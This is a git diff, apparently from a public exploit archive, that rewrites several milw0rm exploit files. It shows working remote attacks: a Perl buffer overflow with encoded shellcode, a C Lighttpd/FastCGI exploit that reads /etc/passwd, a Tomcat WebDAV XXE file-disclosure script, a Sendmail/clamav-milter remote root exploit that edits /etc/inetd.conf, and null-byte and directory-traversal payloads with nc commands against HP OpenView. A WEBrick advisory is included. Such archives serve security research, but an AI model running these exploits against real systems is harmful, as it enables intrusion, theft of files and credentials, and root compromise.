+"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59". +"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59". +"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59". +"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\xe8\xa4\xff\xff\xff". +"\x49\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49". +"\x49\x49\x51\x5a\x6a\x42\x58\x50\x30\x42\x30\x42\x6b\x42\x41\x52". +"\x42\x41\x32\x42\x41\x32\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50". +"\x75\x59\x79\x53\x5a\x31\x71\x33\x68\x4d\x49\x50\x52\x32\x48\x76". +"\x70\x43\x32\x55\x45\x6f\x43\x6c\x49\x68\x61\x36\x32\x51\x52\x36". +"\x32\x62\x62\x52\x72\x50\x6a\x66\x70\x5a\x6d\x4f\x70\x4f\x69\x6f". +"\x63\x50\x51\x32\x73\x73\x62\x50\x6a\x72\x48\x36\x38\x38\x4d\x4f". +"\x70\x4c\x70\x51\x7a\x68\x4d\x6f\x70\x62\x72\x62\x73\x50\x52\x58". +"\x30\x65\x4e\x5a\x6d\x4d\x50\x6c\x57\x32\x4a\x66\x62\x31\x49\x41". +"\x7a\x41\x4a\x52\x78\x46\x31\x30\x57\x32\x71\x4a\x6d\x4d\x50\x77". +"\x39\x51\x69\x6c\x35\x30\x50\x32\x48\x66\x4f\x56\x4f\x32\x53\x62". +"\x48\x52\x48\x76\x4f\x70\x62\x32\x49\x50\x6e\x4d\x59\x5a\x43\x52". +"\x70\x72\x74\x56\x33\x70\x53\x6e\x50\x47\x4b\x38\x4d\x6b\x30\x42". +"A" x 100; + +$alignment = 4127; + +$|=1; + +if ($target eq 1) { + $shellcode = $lnx_shellcode; + $addr = 0xbffff060; +} + +if ($target eq 2) { + $shellcode = $lnx_shellcode; + $addr = 0xbfffef4c; +} + +if ($target eq 3) { + $shellcode = $bsd_shellcode; + $addr = 0xbfbfe5d5; +} + +$offset = pack('l', $addr); + +$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], + PeerPort => $port, + Proto => 'tcp'); + +$a = "A" x ($alignment-4-length($shellcode)) . $shellcode . $offset; + +print $sock "GET /$a HTTP/1.0\r\n\r\n"; + +while(<$sock>) { + print; +} + +# milw0rm.com [2007-06-22] diff --git a/platforms/multiple/remote/4391.c b/platforms/multiple/remote/4391.c index fb83a8f43..59364228e 100755 --- a/platforms/multiple/remote/4391.c +++ b/platforms/multiple/remote/4391.c @@ -1,144 +1,144 @@ -/* - * Remote Lighttpd + FastCGI + PHP example exploit - * - * Tested with Lighttpd 1.4.16 and PHP 5.2.4 - * - * To avoid abuse there's a "remove me" in the code. - * - * Example: - * - * # ./exploit localhost 80 /etc/passwd - * - * or - * - * # wget --referer="" localhost - * # ./exploit localhost 80 /var/log/lighttpd/access.log - * - * - * Mattias Bengtsson - * - * http://www.secweb.se/ - * - */ - -#include -#include -#include -#include - -#include -#include - -#include -#include -#include - -int append_header(char *p, int c, int a, int b) -{ - c = 0x41 + (c % 25); - - memset(p, c, a + b + 4); - - p[a + 0 + 0] = ':'; - p[a + 0 + 1] = ' '; - p[a + b + 2] = '\r'; - p[a + b + 3] = '\n'; - - return a + b + 4; -} - -int network(const char *host, int port) -{ - struct sockaddr_in addr; - struct hostent *he; - int sock; - - sock = socket(AF_INET, SOCK_STREAM, 0); - - addr.sin_family = AF_INET; - - if((he = gethostbyname(host)) == NULL) - return 0; - - memcpy(&addr.sin_addr, he->h_addr_list[0], he->h_length); - - addr.sin_port = htons(port); - - connect(sock, (struct sockaddr *)&addr, sizeof(addr)); - - return sock; -} - -int main(int argc, char **argv) -{ - char *b, *p; - int sock, i; - char tmp[1024]; - - if(argc < 4) { - fprintf(stderr, "Usage: %s \n", argv[0]); - exit(0); - } - - sock = network(argv[1], atoi(argv[2])); - - if(sock <= 0) { - fprintf(stderr, "Host down?\n"); - exit(0); - } - - b = p = malloc(0xffff + 0xffff); - - p += sprintf(p, "GET /index.php HTTP/1.1\r\n"); - p += sprintf(p, "Host: %s\r\n", argv[1]); - p += sprintf(p, "A: A\r\nB: "); - - *p++ = 128; - *p++ = 0x00; - *p++ = 0x54; - *p++ = 0x42; - *p++ = '\r'; - *p++ = '\n'; - p = 0x00; - - p += append_header(p, 0, 4, 1); - p += append_header(p, 1, 200 , 25079); - - p -= 3631; - - *p++ = 1; // Version - *p++ = 4; // Type - *p++ = 0; - *p++ = 0; - - i = sprintf(tmp, "SCRIPT_FILENAME"); - sprintf(tmp + i, "%s", argv[3]); - - *p++ = 0x00; // Length - *p++ = 2 + strlen(tmp); // Length - *p++ = 0x00; // Padding - *p++ = 0x10; - *p++ = i; // name_len - *p++ = strlen(tmp) - i; // var_len - - memcpy(p, tmp, strlen(tmp)); - - p += 3631 - 8 - 2; - - p += append_header(p, 2, 200, 40007); - p += sprintf(p, "\r\n\r\n"); - - write(sock, b, (p - b)); - - i = read(sock, b, 0xffff); - *(b + i) = 0; - - printf("%s\n", b); - - free(b); - close(sock); - - return 0; -} - -// milw0rm.com [2007-09-10] +/* + * Remote Lighttpd + FastCGI + PHP example exploit + * + * Tested with Lighttpd 1.4.16 and PHP 5.2.4 + * + * To avoid abuse there's a "remove me" in the code. + * + * Example: + * + * # ./exploit localhost 80 /etc/passwd + * + * or + * + * # wget --referer="" localhost + * # ./exploit localhost 80 /var/log/lighttpd/access.log + * + * + * Mattias Bengtsson + * + * http://www.secweb.se/ + * + */ + +#include +#include +#include +#include + +#include +#include + +#include +#include +#include + +int append_header(char *p, int c, int a, int b) +{ + c = 0x41 + (c % 25); + + memset(p, c, a + b + 4); + + p[a + 0 + 0] = ':'; + p[a + 0 + 1] = ' '; + p[a + b + 2] = '\r'; + p[a + b + 3] = '\n'; + + return a + b + 4; +} + +int network(const char *host, int port) +{ + struct sockaddr_in addr; + struct hostent *he; + int sock; + + sock = socket(AF_INET, SOCK_STREAM, 0); + + addr.sin_family = AF_INET; + + if((he = gethostbyname(host)) == NULL) + return 0; + + memcpy(&addr.sin_addr, he->h_addr_list[0], he->h_length); + + addr.sin_port = htons(port); + + connect(sock, (struct sockaddr *)&addr, sizeof(addr)); + + return sock; +} + +int main(int argc, char **argv) +{ + char *b, *p; + int sock, i; + char tmp[1024]; + + if(argc < 4) { + fprintf(stderr, "Usage: %s \n", argv[0]); + exit(0); + } + + sock = network(argv[1], atoi(argv[2])); + + if(sock <= 0) { + fprintf(stderr, "Host down?\n"); + exit(0); + } + + b = p = malloc(0xffff + 0xffff); + + p += sprintf(p, "GET /index.php HTTP/1.1\r\n"); + p += sprintf(p, "Host: %s\r\n", argv[1]); + p += sprintf(p, "A: A\r\nB: "); + + *p++ = 128; + *p++ = 0x00; + *p++ = 0x54; + *p++ = 0x42; + *p++ = '\r'; + *p++ = '\n'; + p = 0x00; + + p += append_header(p, 0, 4, 1); + p += append_header(p, 1, 200 , 25079); + + p -= 3631; + + *p++ = 1; // Version + *p++ = 4; // Type + *p++ = 0; + *p++ = 0; + + i = sprintf(tmp, "SCRIPT_FILENAME"); + sprintf(tmp + i, "%s", argv[3]); + + *p++ = 0x00; // Length + *p++ = 2 + strlen(tmp); // Length + *p++ = 0x00; // Padding + *p++ = 0x10; + *p++ = i; // name_len + *p++ = strlen(tmp) - i; // var_len + + memcpy(p, tmp, strlen(tmp)); + + p += 3631 - 8 - 2; + + p += append_header(p, 2, 200, 40007); + p += sprintf(p, "\r\n\r\n"); + + write(sock, b, (p - b)); + + i = read(sock, b, 0xffff); + *(b + i) = 0; + + printf("%s\n", b); + + free(b); + close(sock); + + return 0; +} + +// milw0rm.com [2007-09-10] diff --git a/platforms/multiple/remote/4399.html b/platforms/multiple/remote/4399.html index 3034e07af..fdd75a87a 100755 --- a/platforms/multiple/remote/4399.html +++ b/platforms/multiple/remote/4399.html @@ -1,14 +1,14 @@ - - - - - - -# milw0rm.com [2007-09-12] + + + + + + +# milw0rm.com [2007-09-12] diff --git a/platforms/multiple/remote/4530.pl b/platforms/multiple/remote/4530.pl index 8f3021ec9..e0884ca1a 100755 --- a/platforms/multiple/remote/4530.pl +++ b/platforms/multiple/remote/4530.pl @@ -1,79 +1,79 @@ -#!/usr/bin/perl -#****************************************************** -# Apache Tomcat Remote File Disclosure Zeroday Xploit -# kcdarookie aka eliteb0y / 2007 -# -# thanx to the whole team & andi :) -# +++KEEP PRIV8+++ -# -# This Bug may reside in different WebDav implementations, -# Warp your mind! -# +You will need auth for the exploit to work... -#****************************************************** - -use IO::Socket; -use MIME::Base64; ### FIXME! Maybe support other auths too ? - -# SET REMOTE PORT HERE -$remoteport = 8080; - -sub usage { - print "Apache Tomcat Remote File Disclosure Zeroday Xploit\n"; - print "kcdarookie aka eliteb0y / 2007\n"; - print "usage: perl TOMCATXPL [username] [password]\n"; - print "example: perl TOMCATXPL www.hostname.com /webdav /etc/passwd tomcat tomcat\n";exit; -} - -if ($#ARGV < 2) {usage();} - -$hostname = $ARGV[0]; -$webdavfile = $ARGV[1]; -$remotefile = $ARGV[2]; - -$username = $ARGV[3]; -$password = $ARGV[4]; - -my $sock = IO::Socket::INET->new(PeerAddr => $hostname, - PeerPort => $remoteport, - Proto => 'tcp'); - -$|=1; -$BasicAuth = encode_base64("$username:$password"); - -$KRADXmL = -"\n" -."\n" -."]>\n" -."\n" -."\n" -."\n" -."\n" -."\n" -."\n" -."&RemoteX;\n" -."\n" -."\n" -."\n" -."\n"; - -print "Apache Tomcat Remote File Disclosure Zeroday Xploit\n"; -print "kcdarookie aka eliteb0y / 2007\n"; -print "Launching Remote Exploit...\n"; - -$ExploitRequest = - "LOCK $webdavfile HTTP/1.1\r\n" -."Host: $hostname\r\n"; - -if ($username ne "") { -$ExploitRequest .= "Authorization: Basic $BasicAuth\r\n"; -} -$ExploitRequest .= "Content-Type: text/xml\r\nContent-Length: ".length($KRADXmL)."\r\n\r\n" . $KRADXmL; - -print $sock $ExploitRequest; - -while(<$sock>) { - print; -} - -# milw0rm.com [2007-10-14] +#!/usr/bin/perl +#****************************************************** +# Apache Tomcat Remote File Disclosure Zeroday Xploit +# kcdarookie aka eliteb0y / 2007 +# +# thanx to the whole team & andi :) +# +++KEEP PRIV8+++ +# +# This Bug may reside in different WebDav implementations, +# Warp your mind! +# +You will need auth for the exploit to work... +#****************************************************** + +use IO::Socket; +use MIME::Base64; ### FIXME! Maybe support other auths too ? + +# SET REMOTE PORT HERE +$remoteport = 8080; + +sub usage { + print "Apache Tomcat Remote File Disclosure Zeroday Xploit\n"; + print "kcdarookie aka eliteb0y / 2007\n"; + print "usage: perl TOMCATXPL [username] [password]\n"; + print "example: perl TOMCATXPL www.hostname.com /webdav /etc/passwd tomcat tomcat\n";exit; +} + +if ($#ARGV < 2) {usage();} + +$hostname = $ARGV[0]; +$webdavfile = $ARGV[1]; +$remotefile = $ARGV[2]; + +$username = $ARGV[3]; +$password = $ARGV[4]; + +my $sock = IO::Socket::INET->new(PeerAddr => $hostname, + PeerPort => $remoteport, + Proto => 'tcp'); + +$|=1; +$BasicAuth = encode_base64("$username:$password"); + +$KRADXmL = +"\n" +."\n" +."]>\n" +."\n" +."\n" +."\n" +."\n" +."\n" +."\n" +."&RemoteX;\n" +."\n" +."\n" +."\n" +."\n"; + +print "Apache Tomcat Remote File Disclosure Zeroday Xploit\n"; +print "kcdarookie aka eliteb0y / 2007\n"; +print "Launching Remote Exploit...\n"; + +$ExploitRequest = + "LOCK $webdavfile HTTP/1.1\r\n" +."Host: $hostname\r\n"; + +if ($username ne "") { +$ExploitRequest .= "Authorization: Basic $BasicAuth\r\n"; +} +$ExploitRequest .= "Content-Type: text/xml\r\nContent-Length: ".length($KRADXmL)."\r\n\r\n" . $KRADXmL; + +print $sock $ExploitRequest; + +while(<$sock>) { + print; +} + +# milw0rm.com [2007-10-14] diff --git a/platforms/multiple/remote/4556.txt b/platforms/multiple/remote/4556.txt index ff0aabc5e..0322ad79f 100755 --- a/platforms/multiple/remote/4556.txt +++ b/platforms/multiple/remote/4556.txt @@ -1,75 +1,75 @@ -######################################################################################## -########### _______ __ _____ ___ __ ########### -########### |_ _| |--.-----.| \.-----.' _|.---.-.----.-----.--| | ########### -########### | | | | -__|| -- | -__| _|| _ | __| -__| _ | ########### -########### |___| |__|__|_____||_____/|_____|__| |___._|____|_____|_____| ########### -########### ########### -########### TheDefaced.org ########### -########### TheDefaced Security Team Presents An 0-day. ########### -########### LiteSpeed Remote Mime Type Injection ########### -########### Discovered by:Tr3mbl3r ########### -########### Shouts to his kitty kats and tacos. ########### -######################################################################################## -# Product: # -# LiteSpeed/Discovered in <==3.2.3 Should work in all other versions below. # -# # -# Vuln: # -# Remote Mime Type Injection # -# # -# Description: # -# Litespeed will parse an URL/Files mimetype incorrectly. # -# When given a nullbyte. # -# # -# Patch: # -# Upgrade to LiteSpeed 3.2.4 has just been released today. # -# 9:15AM PST OCT 22 When I wrote this it's now 9:30AM PST OCT 22 # -# # -# This vuln was found before an update was released they fixed it after they found it..# -# In their logs. # -# # -# Risk: Extremely High # -######################################################################################## -# Example: # -# Basicly if you had a URL like so http://www.site.com/index.php. # -# And you wanted this websites source you could simply add a nullbyte and an extension # -# Like So http://www.site.com/index.php%00.txt # -# Litespeed would then at this point asume the file is a txt file. # -# # -# Keep in mind that this vuln is Mime Type Injection... so it works with any type. # -# Like if you did %00.rar it would asume the index.php was a rar file. # -# Theres a numerous ammount of things you could do. # -# # -# As to of why litespeed does this is not confirmed by us just yet. # -# # -# I asume it has somthing to do with mimetype handling thus the name of the exploit. # -# MimeType Injection. # -######################################################################################## -# An Example of This Vuln being put in to use. # -# # -# The Following is WordPress.com's Wp-Config.php # -# http://wordpress.com/wp-config.php%00.txt # -######################################################################################## -# ########### -# # -# # -################################################################################################## -# Contact Us # -################################################################################################## -# WebSite: http://www.thedefaced.org # -# Forums for more info: http://www.thedefaced.org/forums/ # -# IRC: irc.thedefaced.org/#TheDefaced # -################################################################################################## - -# milw0rm.com [2007-10-22] +######################################################################################## +########### _______ __ _____ ___ __ ########### +########### |_ _| |--.-----.| \.-----.' _|.---.-.----.-----.--| | ########### +########### | | | | -__|| -- | -__| _|| _ | __| -__| _ | ########### +########### |___| |__|__|_____||_____/|_____|__| |___._|____|_____|_____| ########### +########### ########### +########### TheDefaced.org ########### +########### TheDefaced Security Team Presents An 0-day. ########### +########### LiteSpeed Remote Mime Type Injection ########### +########### Discovered by:Tr3mbl3r ########### +########### Shouts to his kitty kats and tacos. ########### +######################################################################################## +# Product: # +# LiteSpeed/Discovered in <==3.2.3 Should work in all other versions below. # +# # +# Vuln: # +# Remote Mime Type Injection # +# # +# Description: # +# Litespeed will parse an URL/Files mimetype incorrectly. # +# When given a nullbyte. # +# # +# Patch: # +# Upgrade to LiteSpeed 3.2.4 has just been released today. # +# 9:15AM PST OCT 22 When I wrote this it's now 9:30AM PST OCT 22 # +# # +# This vuln was found before an update was released they fixed it after they found it..# +# In their logs. # +# # +# Risk: Extremely High # +######################################################################################## +# Example: # +# Basicly if you had a URL like so http://www.site.com/index.php. # +# And you wanted this websites source you could simply add a nullbyte and an extension # +# Like So http://www.site.com/index.php%00.txt # +# Litespeed would then at this point asume the file is a txt file. # +# # +# Keep in mind that this vuln is Mime Type Injection... so it works with any type. # +# Like if you did %00.rar it would asume the index.php was a rar file. # +# Theres a numerous ammount of things you could do. # +# # +# As to of why litespeed does this is not confirmed by us just yet. # +# # +# I asume it has somthing to do with mimetype handling thus the name of the exploit. # +# MimeType Injection. # +######################################################################################## +# An Example of This Vuln being put in to use. # +# # +# The Following is WordPress.com's Wp-Config.php # +# http://wordpress.com/wp-config.php%00.txt # +######################################################################################## +# ########### +# # +# # +################################################################################################## +# Contact Us # +################################################################################################## +# WebSite: http://www.thedefaced.org # +# Forums for more info: http://www.thedefaced.org/forums/ # +# IRC: irc.thedefaced.org/#TheDefaced # +################################################################################################## + +# milw0rm.com [2007-10-22] diff --git a/platforms/multiple/remote/4761.pl b/platforms/multiple/remote/4761.pl index d16c5c1e5..44bed6a3b 100755 --- a/platforms/multiple/remote/4761.pl +++ b/platforms/multiple/remote/4761.pl @@ -1,28 +1,28 @@ -### black-hole.pl -### Sendmail w/ clamav-milter Remote Root Exploit -### Copyright (c) 2007 Eliteboy -######################################################## -use IO::Socket; - -print "Sendmail w/ clamav-milter Remote Root Exploit\n"; -print "Copyright (C) 2007 Eliteboy\n"; - -if ($#ARGV != 0) {print "Give me a host to connect.\n";exit;} - -print "Attacking $ARGV[0]...\n"; - -$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], - PeerPort => '25', - Proto => 'tcp'); - -print $sock "ehlo you\r\n"; -print $sock "mail from: <>\r\n"; -print $sock "rcpt to: > /etc/inetd.conf\"@localhost>\r\n"; -print $sock "rcpt to: \r\n"; -print $sock "data\r\n.\r\nquit\r\n"; - -while (<$sock>) { - print; -} - -# milw0rm.com [2007-12-21] +### black-hole.pl +### Sendmail w/ clamav-milter Remote Root Exploit +### Copyright (c) 2007 Eliteboy +######################################################## +use IO::Socket; + +print "Sendmail w/ clamav-milter Remote Root Exploit\n"; +print "Copyright (C) 2007 Eliteboy\n"; + +if ($#ARGV != 0) {print "Give me a host to connect.\n";exit;} + +print "Attacking $ARGV[0]...\n"; + +$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], + PeerPort => '25', + Proto => 'tcp'); + +print $sock "ehlo you\r\n"; +print $sock "mail from: <>\r\n"; +print $sock "rcpt to: > /etc/inetd.conf\"@localhost>\r\n"; +print $sock "rcpt to: \r\n"; +print $sock "data\r\n.\r\nquit\r\n"; + +while (<$sock>) { + print; +} + +# milw0rm.com [2007-12-21] diff --git a/platforms/multiple/remote/5215.txt b/platforms/multiple/remote/5215.txt index 357d10999..847a61ff5 100755 --- a/platforms/multiple/remote/5215.txt +++ b/platforms/multiple/remote/5215.txt @@ -1,111 +1,111 @@ ------------------------------------------------------------------------------------- -Digital Security Research Group [DSecRG] Advisory #DSECRG-08-018 - - -Application: Ruby 1.8.6 (WEBrick Web server Toolkit and applications that used WEBrick, like Metasploit 3.1) -Versions Affected: - 1.8.4 and all prior versions - 1.8.5-p114 and all prior versions - 1.8.6-p113 and all prior versions - 1.9.0-1 and all prior version - -Vendor URL: http://www.ruby-lang.org/ -Bugs: Directory traversal File Download -Exploits: YES -Reported: 20.02.2008 -Vendor response: 22.02.2008 -Solution: 03.03.2008 -Date of Public Advisory: 06.03.2008 -Authors: Alexandr Polyakov, Stas Svistunovich - Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru) - - - -Description -*********** - -WEBrick Httpd server has directory traversal security vulnerability. - -WEBrick is an HTTP server library written in Ruby that uses servlets to extend its capabilities. -Built into WEBrick are four servlets, handling CGI, ERb, file directories, and a generic Proc servlet. -Ruby on Rails uses WEBrick as a quick and easy webserver to start developing your Rails applications. -However, for whatever ease of development WEBrick adds to your application, it is generally considered not suitable for any production environment. - - - - -Details -******* - -The following programs are vulnerable. - -Programs that publish files using WEBrick::HTTPServer.new with the :DocumentRoot option -Programs that publish files using WEBrick::HTTPServlet::FileHandler - -Affected systems are: -1. Systems that accept backslash (\) as a path separator, such as Windows. -2. Systems that use case insensitive filesystems such as NTFS on Windows, HFS on Mac OS X. - - -This vulnerability has the following impacts. -1. Attacker can access private files by sending a url with url encoded backslash (\). This exploit works only on systems that accept backslash as a path separator. - -Example: - -http://[server]:[port]/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/boot.ini - - -2. Attacker can access files that matches to the patterns specified by the :NondisclosureName option (the default value is [".ht*", "*~"]). This exploit works only on systems that use case insensitive filesystems. - - - - - - - - -Additional info -*************** - -WEBrick is used to build own HTTP servers and used in many applications such as Metasploit 3.1 and Karma Tools - - - - -Fix Information -*************** - -fixed on 03.03.2008. - -http://www.ruby-lang.org/en/news/2008/03/03/webrick-file-access-vulnerability/ - - -Patches can be downloaded here: - - -1.8 series -Please upgrade to 1.8.5-p115 or 1.8.6-p114. - (md5sum: 20ca6cc87eb077296806412feaac0356) - (md5sum: 500a9f11613d6c8ab6dcf12bec1b3ed3) -1.9 series -Please apply the following patch to lib/webrick/httpservlet/filehandler.rb. - (md5sum: b7b58aed40fa1609a67f53cfd3a13257) - - - -About -***** - -Digital Security is leading IT security company in Russia, providing information security consulting, audit and - -penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI - -DSS standards. Digital Security Research Group focuses on web application and database security problems with - -vulnerability reports, advisories and whitepapers posted regularly on our website. - - -Contact: research [at] dsec [dot] ru - http://www.dsec.ru (in Russian) - -# milw0rm.com [2008-03-06] +------------------------------------------------------------------------------------ +Digital Security Research Group [DSecRG] Advisory #DSECRG-08-018 + + +Application: Ruby 1.8.6 (WEBrick Web server Toolkit and applications that used WEBrick, like Metasploit 3.1) +Versions Affected: + 1.8.4 and all prior versions + 1.8.5-p114 and all prior versions + 1.8.6-p113 and all prior versions + 1.9.0-1 and all prior version + +Vendor URL: http://www.ruby-lang.org/ +Bugs: Directory traversal File Download +Exploits: YES +Reported: 20.02.2008 +Vendor response: 22.02.2008 +Solution: 03.03.2008 +Date of Public Advisory: 06.03.2008 +Authors: Alexandr Polyakov, Stas Svistunovich + Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru) + + + +Description +*********** + +WEBrick Httpd server has directory traversal security vulnerability. + +WEBrick is an HTTP server library written in Ruby that uses servlets to extend its capabilities. +Built into WEBrick are four servlets, handling CGI, ERb, file directories, and a generic Proc servlet. +Ruby on Rails uses WEBrick as a quick and easy webserver to start developing your Rails applications. +However, for whatever ease of development WEBrick adds to your application, it is generally considered not suitable for any production environment. + + + + +Details +******* + +The following programs are vulnerable. + +Programs that publish files using WEBrick::HTTPServer.new with the :DocumentRoot option +Programs that publish files using WEBrick::HTTPServlet::FileHandler + +Affected systems are: +1. Systems that accept backslash (\) as a path separator, such as Windows. +2. Systems that use case insensitive filesystems such as NTFS on Windows, HFS on Mac OS X. + + +This vulnerability has the following impacts. +1. Attacker can access private files by sending a url with url encoded backslash (\). This exploit works only on systems that accept backslash as a path separator. + +Example: + +http://[server]:[port]/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/boot.ini + + +2. Attacker can access files that matches to the patterns specified by the :NondisclosureName option (the default value is [".ht*", "*~"]). This exploit works only on systems that use case insensitive filesystems. + + + + + + + + +Additional info +*************** + +WEBrick is used to build own HTTP servers and used in many applications such as Metasploit 3.1 and Karma Tools + + + + +Fix Information +*************** + +fixed on 03.03.2008. + +http://www.ruby-lang.org/en/news/2008/03/03/webrick-file-access-vulnerability/ + + +Patches can be downloaded here: + + +1.8 series +Please upgrade to 1.8.5-p115 or 1.8.6-p114. + (md5sum: 20ca6cc87eb077296806412feaac0356) + (md5sum: 500a9f11613d6c8ab6dcf12bec1b3ed3) +1.9 series +Please apply the following patch to lib/webrick/httpservlet/filehandler.rb. + (md5sum: b7b58aed40fa1609a67f53cfd3a13257) + + + +About +***** + +Digital Security is leading IT security company in Russia, providing information security consulting, audit and + +penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI + +DSS standards. Digital Security Research Group focuses on web application and database security problems with + +vulnerability reports, advisories and whitepapers posted regularly on our website. + + +Contact: research [at] dsec [dot] ru + http://www.dsec.ru (in Russian) + +# milw0rm.com [2008-03-06] diff --git a/platforms/multiple/remote/5430.txt b/platforms/multiple/remote/5430.txt index 21df47daa..17d344af6 100755 --- a/platforms/multiple/remote/5430.txt +++ b/platforms/multiple/remote/5430.txt @@ -1,151 +1,151 @@ -####################################################################### - - Luigi Auriemma - -Application: HP OpenView Network Node Manager - http://www.openview.hp.com/products/nnm/ -Versions: <= 7.53 -Platforms: Windows (tested), Solaris, Linux, HP-UX -Bugs: A] CGIs directory traversal - B] Denial of Service in ovalarmsrv - C] NULL pointer in ovalarmsrv - D] process termination in ovtopmd -Exploitation: remote -Date: 11 Apr 2008 -Author: Luigi Auriemma - e-mail: aluigi@autistici.org - web: aluigi.org - - -####################################################################### - - -1) Introduction -2) Bugs -3) The Code -4) Fix - - -####################################################################### - -=============== -1) Introduction -=============== - - ->From vendor's website: -OpenView NNM "automates the process of developing a hyper-accurate -topology of your physical network, virtual network services and the -complex relationships between them. It then uses that topology as the -basis for intelligent root cause analysis to enhance network -availability and performance." - - -####################################################################### - -======= -2) Bugs -======= - ---------------------------- -A] CGIs directory traversal ---------------------------- - -The CGIs available in NNM use some instructions which filters malicious -chars in the parameters passed by the clients, for example to avoid -directory traversal attacks, XSS and so on. - -The path delimiter filtered by these CGIs is the backslash char, so -using the slash will allow an attacker to download the files from the -disk on which is installed NNM. - - ----------------------------------- -B] Denial of Service in ovalarmsrv ----------------------------------- - -The ovalarmsrv service listening on port 2954 can be easily freezed -with CPU at 100% and without the possibility of handling further -requests on both its ports 2953 and 2954 simply sending an incomplete -multi line request. -In short the last numeric parameters of the requests 25, 45, 46, 47 and -81 is used to specify how much sub-arguments (one per line) will be -sent. -So ovalarmsrv starts a loop which terminates when all the sub arguments -are received; closing the connection or not sending all or part of -these arguments will freeze the entire service. -The following are all the supported requests and their "sscanf" format: - - REQUEST_CONTRIB_EVENTS (22): "%d %d %s" - REQUEST_PRINT (25): "%d %d %d %d %s" - REQUEST_DETAILS (33): "%d %d %s" - REQUEST_EVENT_DELETE (35): "%d %d %s" - REQUEST_EVENT_ACK (36): "%d %d %s" - REQUEST_RUN_ACTION (37): "%d %d %s %s" - REQUEST_SPECDATA (41): - REQUEST_EVENT_UNACK (44): "%d %d %s" - REQUEST_SAVE (45): "%d %d %d %d %s" - REQUEST_CAT_CHANGE (46): "%d %d %d %[^\n]" - REQUEST_SEV_CHANGE (47): "%d %d %d %[^\n]" - REQUEST_CONF_ACTIONS (48): "%d %d\n" - REQUEST_RESTORE_STATE (62): "%d %[^\n]" - REQUEST_SAVE_DIR (63): - REQUEST_LOCALE (66): "%d" - REQUEST_FORMAT_PRINT (81): "%d %d %d %d %s" - REQUEST_CONF_RUN_ACTION (??): "%d %d %d %[^\n]" - - ------------------------------ -C] NULL pointer in ovalarmsrv ------------------------------ - -The parameter which specifies the amount of sub-arguments described -above is used to allocate a certain amount of initial dynamic memory -(value * 2) for storing all the sub-arguments which is then -reallocated wheen needed. - -Specifying a too big unallocable amount of sub-arguments results in a -NULL pointer which will crash the service. - - ---------------------------------- -D] process termination in ovtopmd ---------------------------------- - -The ovtopmd service listening on port 2532 uses a special type of -packet (0x36) for forcing the termination of the process ("Exiting due -to request of ovtopmd -k."), so an attacker can use this packet for -causing a Denial of Service. - - -####################################################################### - -=========== -3) The Code -=========== - - -A] -http://SERVER/OvCgi/OpenView5.exe?Target=Main&Action=../../../../../../windows/win.ini - -B,C,D] -http://aluigi.org/poc/closedviewx.zip - - nc SERVER 2954 -v -v -w 2 < closedviewx1.txt - nc SERVER 2954 -v -v < closedviewx2.txt - nc SERVER 2532 -v -v < closedviewx3.txt - - -####################################################################### - -====== -4) Fix -====== - - -HP has been alerted and is working on a fix - - -####################################################################### - -# milw0rm.com [2008-04-11] +####################################################################### + + Luigi Auriemma + +Application: HP OpenView Network Node Manager + http://www.openview.hp.com/products/nnm/ +Versions: <= 7.53 +Platforms: Windows (tested), Solaris, Linux, HP-UX +Bugs: A] CGIs directory traversal + B] Denial of Service in ovalarmsrv + C] NULL pointer in ovalarmsrv + D] process termination in ovtopmd +Exploitation: remote +Date: 11 Apr 2008 +Author: Luigi Auriemma + e-mail: aluigi@autistici.org + web: aluigi.org + + +####################################################################### + + +1) Introduction +2) Bugs +3) The Code +4) Fix + + +####################################################################### + +=============== +1) Introduction +=============== + + +>From vendor's website: +OpenView NNM "automates the process of developing a hyper-accurate +topology of your physical network, virtual network services and the +complex relationships between them. It then uses that topology as the +basis for intelligent root cause analysis to enhance network +availability and performance." + + +####################################################################### + +======= +2) Bugs +======= + +--------------------------- +A] CGIs directory traversal +--------------------------- + +The CGIs available in NNM use some instructions which filters malicious +chars in the parameters passed by the clients, for example to avoid +directory traversal attacks, XSS and so on. + +The path delimiter filtered by these CGIs is the backslash char, so +using the slash will allow an attacker to download the files from the +disk on which is installed NNM. + + +---------------------------------- +B] Denial of Service in ovalarmsrv +---------------------------------- + +The ovalarmsrv service listening on port 2954 can be easily freezed +with CPU at 100% and without the possibility of handling further +requests on both its ports 2953 and 2954 simply sending an incomplete +multi line request. +In short the last numeric parameters of the requests 25, 45, 46, 47 and +81 is used to specify how much sub-arguments (one per line) will be +sent. +So ovalarmsrv starts a loop which terminates when all the sub arguments +are received; closing the connection or not sending all or part of +these arguments will freeze the entire service. +The following are all the supported requests and their "sscanf" format: + + REQUEST_CONTRIB_EVENTS (22): "%d %d %s" + REQUEST_PRINT (25): "%d %d %d %d %s" + REQUEST_DETAILS (33): "%d %d %s" + REQUEST_EVENT_DELETE (35): "%d %d %s" + REQUEST_EVENT_ACK (36): "%d %d %s" + REQUEST_RUN_ACTION (37): "%d %d %s %s" + REQUEST_SPECDATA (41): + REQUEST_EVENT_UNACK (44): "%d %d %s" + REQUEST_SAVE (45): "%d %d %d %d %s" + REQUEST_CAT_CHANGE (46): "%d %d %d %[^\n]" + REQUEST_SEV_CHANGE (47): "%d %d %d %[^\n]" + REQUEST_CONF_ACTIONS (48): "%d %d\n" + REQUEST_RESTORE_STATE (62): "%d %[^\n]" + REQUEST_SAVE_DIR (63): + REQUEST_LOCALE (66): "%d" + REQUEST_FORMAT_PRINT (81): "%d %d %d %d %s" + REQUEST_CONF_RUN_ACTION (??): "%d %d %d 